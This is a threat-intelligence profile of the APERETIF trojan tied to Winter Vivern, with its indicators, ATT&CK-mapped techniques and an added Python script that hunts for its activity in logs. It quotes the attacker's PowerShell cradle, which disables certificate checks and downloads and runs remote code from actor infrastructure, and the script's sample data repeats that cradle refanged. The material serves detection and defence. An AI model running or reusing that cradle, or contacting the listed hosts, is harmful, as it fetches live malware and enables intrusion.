APERETIF
APERETIF is a trojan malware family associated with the UAC-0114 / Winter Vivern espionage group. CERT-UA named the malware based on a development PDB path found in a sample. Reported APERETIF samples were PE32 executables written in Visual C++ with a compilation timestamp of May 2021. The malware automates collection of victim details, maintains access on compromised systems, and beacons to attacker-controlled infrastructure, including marakanas[.]com. Observed behavior includes use of PowerShell with whoami to beacon outbound and retrieve further instructions or downloads, including use of the HTTPS GET URI signatures.php?id=1. APERETIF was used in campaigns targeting government entities and related organizations, with Winter Vivern activity reported against government organizations in Ukraine, Poland, Lithuania, India, the Vatican, Slovakia, and Italy, as well as at least some private telecommunications organizations supporting Ukraine. Delivery tradecraft linked to the actor included phishing websites impersonating official government resources, malicious documents, fake virus-scan lures, and batch scripts disguised as virus scanners that triggered malware downloads from attacker-controlled servers. Compromised WordPress sites including applesaltbeauty[.]com and natply[.]com were used to host APERETIF payloads. The activity has been assessed as aligned with Russian and Belarusian interests, and one report notes APERETIF contains a code line described as typical of Russia-affiliated adversary behavior patterns. Known related infrastructure mentioned in the reporting includes marakanas[.]com, bugiplaysec[.]com, ocs-romastassec[.]com, ocspdep[.]com, security-ocsp[.]com, and troadsecow[.]com; associated IPs include 176.97.66[.]57, 179.43.187[.]175, 179.43.187[.]207, 195.54.170[.]26, and 80.79.124[.]135. Reported associated SHA1 hashes include f39b260a9209013d9559173f12fbc2bd5332c52a and a19d46251636fb46a013c7b52361b7340126ab27.
Groups observed using it
1 distinct threat actor attributed by public researchers.
One malware family of recent activity is APERETIF, named by CERT-UA based on the development PDB path inside the sample... APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com.
Techniques & procedures
8 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique
The group made use of compromised WordPress websites to host the malware, such as with hxxps://applesaltbeauty[.]com/wordpress/wp-includes/widgets/classwp/521734i and hxxps://natply[.]com/wordpress/wp-includes/fonts/ch/097214o serving as the download location for APERETIF during initial attack stages.
Initial Access
1 technique
In these attacks the threat actor made use of a macro-enabled Excel spreadsheet to infect the target.
Execution
3 techniques
When the threat actor seeks to compromise the organization beyond the theft of legitimate credentials, Winter Vivern tends to rely on shared toolkits, and the abuse of legitimate Windows tools.
powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; iex (new-object net.webclient).DownloadString('hxxps://ocs-romastassec[.]com/goog_comredira3cf7ed34f8.php')"
These samples align with the theme of attacks mimicking a virus scanner, presenting users with the fake scan results similar to the script loaders.
Recent campaigns demonstrate the group's use of lures to initiate the infection process, utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.
Discovery
1 technique
As with the previous script, the trojan makes use of whoami within PowerShell in its initial activity to beacon outbound for further instructions and/or downloads.
Command and Control
2 techniques
APERETIF is a trojan, automating the collection of victim details, maintaining access, and beaconing outbound the actor-controlled domain marakanas[.]com.
...utilizing batch scripts disguised as virus scanners to prompt downloads of malware from attacker-controlled servers.
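The Execution section above quotes the PowerShell download cradle (certificate validation disabled, iex over DownloadString), and the Discovery and Command and Control sections describe whoami-driven beaconing to marakanas[.]com and the other listed infrastructure. The following is an added hunting example written for this page; it is not code from CERT-UA, SentinelOne or the Mallory platform. It runs the page's defanged domains, IPs and the signatures.php?id=1 URI, plus behavioural markers for the quoted cradle, over constructed process-creation and proxy log lines. The proxy line format ("timestamp client_ip METHOD url") and the sample events are assumptions made for the example; the requirement of at least two cradle markers before flagging a process event is a design choice to keep a lone whoami from paging anyone.

```python
"""Hunt for APERETIF-style PowerShell download cradles and C2 beacons
in constructed process-creation and web-proxy log lines (added example)."""
import re
from dataclasses import dataclass, field

# Defanged indicators copied from the write-up; everything else here is constructed.
C2_DOMAINS_DEFANGED = [
    "marakanas[.]com", "bugiplaysec[.]com", "ocs-romastassec[.]com",
    "ocspdep[.]com", "security-ocsp[.]com", "troadsecow[.]com",
]
C2_IPS_DEFANGED = [
    "176.97.66[.]57", "179.43.187[.]175", "179.43.187[.]207",
    "195.54.170[.]26", "80.79.124[.]135",
]
BEACON_URI = "signatures.php?id=1"


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into the form seen in real telemetry."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


C2_DOMAINS = {refang(d) for d in C2_DOMAINS_DEFANGED}
C2_IPS = {refang(i) for i in C2_IPS_DEFANGED}

# Behavioural markers of the cradle quoted in the Execution section.
CRADLE_MARKERS = {
    "tls_validation_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "iex_downloadstring": re.compile(r"\biex\b.*\bDownloadString\s*\(", re.I),
    "noexit_command": re.compile(r"-noexit\b.*\s-c(ommand)?\b", re.I),
    "whoami_in_powershell": re.compile(r"\bwhoami\b", re.I),
}


@dataclass
class Finding:
    source: str           # "process" or "proxy"
    line: str             # the raw event that matched
    reasons: list = field(default_factory=list)


def inspect_process_event(cmdline: str) -> list:
    """Return the names of the cradle markers present in a PowerShell command line."""
    if "powershell" not in cmdline.lower():
        return []
    return [name for name, rx in CRADLE_MARKERS.items() if rx.search(cmdline)]


def inspect_proxy_event(line: str) -> list:
    """Return infrastructure/URI markers present in one proxy log line.
    Assumed constructed format: '<timestamp> <client_ip> <METHOD> <url>'."""
    m = re.match(r"\S+ \S+ (\w+) (\S+)", line)
    if not m:
        return []
    url = m.group(2)
    host = re.sub(r"^https?://", "", url).split("/")[0].split(":")[0]
    reasons = []
    if host in C2_DOMAINS:
        reasons.append(f"known_c2_domain:{host}")
    if host in C2_IPS:
        reasons.append(f"known_c2_ip:{host}")
    if BEACON_URI in url:
        reasons.append(f"beacon_uri:{BEACON_URI}")
    return reasons


def hunt(process_events, proxy_events, min_markers: int = 2) -> list:
    """Combine both log sources into a list of Finding objects."""
    findings = []
    for cmd in process_events:
        reasons = inspect_process_event(cmd)
        # A single marker (e.g. whoami alone) is ordinary admin noise; require two.
        if len(reasons) >= min_markers:
            findings.append(Finding("process", cmd, reasons))
    for line in proxy_events:
        reasons = inspect_proxy_event(line)
        if reasons:  # any hit on known infrastructure or the beacon URI is worth a look
            findings.append(Finding("proxy", line, reasons))
    return findings


# Constructed sample telemetry: one cradle (refanged from the page), two benign commands,
# one beacon to the named C2 domain, one benign request, one request to a listed IP.
SAMPLE_PROCESS_EVENTS = [
    'powershell.exe -noexit -c "[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; '
    'iex (new-object net.webclient).DownloadString(\'https://ocs-romastassec.com/goog_comredira3cf7ed34f8.php\')"',
    'powershell.exe -c "whoami"',
    'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1',
]
SAMPLE_PROXY_EVENTS = [
    "2023-03-01T10:00:01Z 10.0.0.5 GET https://marakanas.com/signatures.php?id=1",
    "2023-03-01T10:00:02Z 10.0.0.5 GET https://www.microsoft.com/",
    "2023-03-01T10:00:03Z 10.0.0.7 GET http://176.97.66.57/update",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_PROCESS_EVENTS, SAMPLE_PROXY_EVENTS):
        print(f"[{f.source}] {', '.join(f.reasons)}\n    {f.line}")
```

Run against the constructed samples it reports three findings: the cradle (three markers), the beacon to marakanas.com carrying the signatures.php?id=1 URI, and the request to a listed IP. The lone whoami command is inspected but not reported, which is the behaviour you want in a hunt that will be wired to paging.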
IOCs tracked for this family
14 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
2 sources tracked across advisories, community write-ups, and news.
A trojan used by Winter Vivern that collects victim details, maintains access, and beacons to actor-controlled infrastructure for further instructions or downloads. It was delivered via fake virus-scan themed lures and hosted on compromised WordPress sites.
APERETIF is a malware used by UAC-0114/Winter Vivern, likely for information stealing and exfiltration, and shows characteristics typical of Russian-affiliated threat actors.